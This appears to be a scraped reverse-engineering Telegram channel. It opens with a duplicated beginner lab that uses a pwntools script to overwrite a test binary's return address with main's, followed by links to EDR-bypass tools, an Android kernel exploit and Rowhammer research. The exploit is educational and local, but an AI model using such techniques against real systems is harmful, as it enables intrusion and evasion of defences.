# Option B: Inside gdb
The address in the example above is the actual address, take it from your output
Code of the file ret2main.py
Denoscription of each line:
offset = how many characters to put to Get the return address
main_addr =
The address you want to return to from nm or gdb
p64() just writes the address in the
8-byte format that the system understands
If after sending the payload you see the message "Enter some text:" comes back, it means you have successfully taken control of the return
Executing gdb commands and checking the registers:
In the terminal:
After running the bt noscript and checking the RIP value, you should see the main address in the RIP or in the return that is executed
Notes
If vuln_plain is built with no-pie- The functions are fixed and you can use the address directly with nm/gdb
If the PIE binary is enabled, the addresses are random, you should turn off ASLR or use leak, but for now, use the no-pie- version for this exercise
This exercise is not about executing malicious code, just demonstrating overwrite and flow control. The goal is to learn the memory structure and how to exploit it step by step
@reverseengine
gdb ./vuln_plain# Note the address, e.g.: 0x401136
(gdb) p main
# or
(gdb) info address main
The address in the example above is the actual address, take it from your output
Code of the file ret2main.py
#!/usr/bin/env python3
from pwn import *
exe = './vuln_plain' # The binary file you created earlier
context.binary = exe
def main():
p = process([exe]) #
Run the program inside the VM
offset = 72 # <--
Fill this with the same
number you found with cyclic_find
main_addr = 0x401136 # <-- Put the address of main from nm or gdb here
# We create a simple payload: n to 'A' to reach the same
offset
# Then we put 8 bytes of the main address (p64) to overwrite the return address
payload = b"A" * offset + p64(main_addr)
# The program waits for input to read the initial message:
p.recvuntil(b"Enter some text:")
p.sendline(payload) # We send the payload
# If it has returned to main, it prints the same message again
# So we can check if the message came back or not
try:
print(p.recvline(timeout=1)) # Print the short output
except EOFError:
print("The program was closed or nothing was returned")
if name == "main":
main(
)
Denoscription of each line:
offset = how many characters to put to Get the return address
main_addr =
The address you want to return to from nm or gdb
p64() just writes the address in the
8-byte format that the system understands
If after sending the payload you see the message "Enter some text:" comes back, it means you have successfully taken control of the return
Executing gdb commands and checking the registers:
In the terminal:
gdb ./vuln_plain
(gdb) break vuln
(gdb) rub
# When it stops:
# In another terminal:
python3 ret2main.py # Until the payload is sent
# Then in gdb:
(gdb) info registers
(gdb) x/40x $rsp
(gdb) bt
After running the bt noscript and checking the RIP value, you should see the main address in the RIP or in the return that is executed
Notes
If vuln_plain is built with no-pie- The functions are fixed and you can use the address directly with nm/gdb
If the PIE binary is enabled, the addresses are random, you should turn off ASLR or use leak, but for now, use the no-pie- version for this exercise
This exercise is not about executing malicious code, just demonstrating overwrite and flow control. The goal is to learn the memory structure and how to exploit it step by step
@reverseengine
❤4🔥1👏1
Linux Kernel Hardening: Ten Years Deep
https://www.youtube.com/watch?v=c_NxzSRG50g
Slides:
https://static.sched.com/hosted_files/lssna2025/9f/KSPP%20Ten%20Years%20Deep.pdf
@reverseengine
https://www.youtube.com/watch?v=c_NxzSRG50g
Slides:
https://static.sched.com/hosted_files/lssna2025/9f/KSPP%20Ten%20Years%20Deep.pdf
@reverseengine
❤3👏1
XLSB: Analyzing a Microsoft Excel Binary Spreadsheet
https://clickallthethings.wordpress.com/2021/02/02/xlsb-analyzing-a-microsoft-excel-binary-spreadsheet/amp/?__twitter_impression=tru
@reverseengine
https://clickallthethings.wordpress.com/2021/02/02/xlsb-analyzing-a-microsoft-excel-binary-spreadsheet/amp/?__twitter_impression=tru
@reverseengine
❤3
A method of Bypassing EDR's Active Projection DLL's by Preventing Entry Point Execution
https://github.com/CCob/SharpBlock/
@reverseengine
https://github.com/CCob/SharpBlock/
@reverseengine
GitHub
GitHub - CCob/SharpBlock: A method of bypassing EDR's active projection DLL's by preventing entry point exection
A method of bypassing EDR's active projection DLL's by preventing entry point exection - CCob/SharpBlock
❤3
A tale of EDR bypass methods
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
@reverseengine
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
@reverseengine
s3cur3th1ssh1t.github.io
A tale of EDR bypass methods | S3cur3Th1sSh1t
In a time full of ransomware as well as Advanced persistent Thread (APT) incidents the importance of detecting those attacking groups has become increasingly...
❤3
DynamicWrapperEx – Windows API Invocation from Windows Script Host
https://www.contextis.com/en/blog/dynamicwrapperex-windows-api-invocation-from-windows-noscript-host?utm_source=twitter&utm_medium=HootsuiteCTXIS&utm_campaign=123a236f-9cd0-427f-bd75-d3dc0ca696fc
@reverseengine
https://www.contextis.com/en/blog/dynamicwrapperex-windows-api-invocation-from-windows-noscript-host?utm_source=twitter&utm_medium=HootsuiteCTXIS&utm_campaign=123a236f-9cd0-427f-bd75-d3dc0ca696fc
@reverseengine
Accenture
Accenture | Let there be change
Across industries and around the world, we’re creating better experiences for people using emerging technologies and human ingenuity. Together, we can reinvent anything.
❤3
Rowhammer Attacks on DDR5 with Self-Correcting Synchronization
https://comsec-files.ethz.ch/papers/phoenix_sp26.pdf
@reverseengine
https://comsec-files.ethz.ch/papers/phoenix_sp26.pdf
@reverseengine
❤3
Walking Through Windows Minifilter Drivers
https://hackyboiz.github.io/2025/08/15/banda/Minifilter-Driver/en
@reverseengine
https://hackyboiz.github.io/2025/08/15/banda/Minifilter-Driver/en
@reverseengine
Understanding SDDL Syntax
https://uwconnect.uw.edu/it?id=kb_article_view&sysparm_article=KB0034194
@reverseengine
https://uwconnect.uw.edu/it?id=kb_article_view&sysparm_article=KB0034194
@reverseengine
❤1
A kernel Exploit for Pixel7/8 Pro with Android 14
https://github.com/0x36/Pixel_GPU_Exploit
@reverseengine
https://github.com/0x36/Pixel_GPU_Exploit
@reverseengine
GitHub
GitHub - 0x36/Pixel_GPU_Exploit: Android 14 kernel exploit for Pixel7/8 Pro
Android 14 kernel exploit for Pixel7/8 Pro. Contribute to 0x36/Pixel_GPU_Exploit development by creating an account on GitHub.
❤2
Debugging Windows Internal with x64dbg
https://www.youtube.com/live/AKcADaAaOT8?si=cLY4BLvDXvnjA7FR
@reverseengine
https://www.youtube.com/live/AKcADaAaOT8?si=cLY4BLvDXvnjA7FR
@reverseengine
YouTube
Debugging Windows Internals with x64dbg!
Join me with my guest Duncan Ogilvie, developer of x64dbg, as he shows us around the tool and shares some Windows debugging techniques. x64dbg is the only actively maintained userland debugger outside of WinDbg, and aims to be much more intuitive and easy…
❤1
The Complexity of Reversing Flutter Applications
https://www.fortiguard.com/events/5403/nullcon-berlin-2024-the-complexity-of-reversing-flutter-applications
@reverseengine
https://www.fortiguard.com/events/5403/nullcon-berlin-2024-the-complexity-of-reversing-flutter-applications
@reverseengine
FortiGuard Labs
Publications | FortiGuard Labs
Flutter is a cross-platform application development platform. With the same codebase, developers write and compile native applications for Android,...
❤2
Analysing Windows Malware on Apple Mac M1/M2 ( Windows 11 ARM ) - Part I
x86/x64 emulation internals on Windows 11 ARM
https://int0xcc.svbtle.com/apple-m2-or-windows-arm-for-malware-analysis
@reverseengine
x86/x64 emulation internals on Windows 11 ARM
https://int0xcc.svbtle.com/apple-m2-or-windows-arm-for-malware-analysis
@reverseengine
Raashid Bhat on Svbtle
Analysing Windows Malware on Apple Mac M1/M2 ( Windows 11 ARM )...
x86/x64 emulation internals on Windows 11 ARM # Introduction # Since the introduction of Intel processors for the MacBooks, malware analysis on Mac has become quite popular, and it has become the hardware of choice for malware analysts. With the...
❤2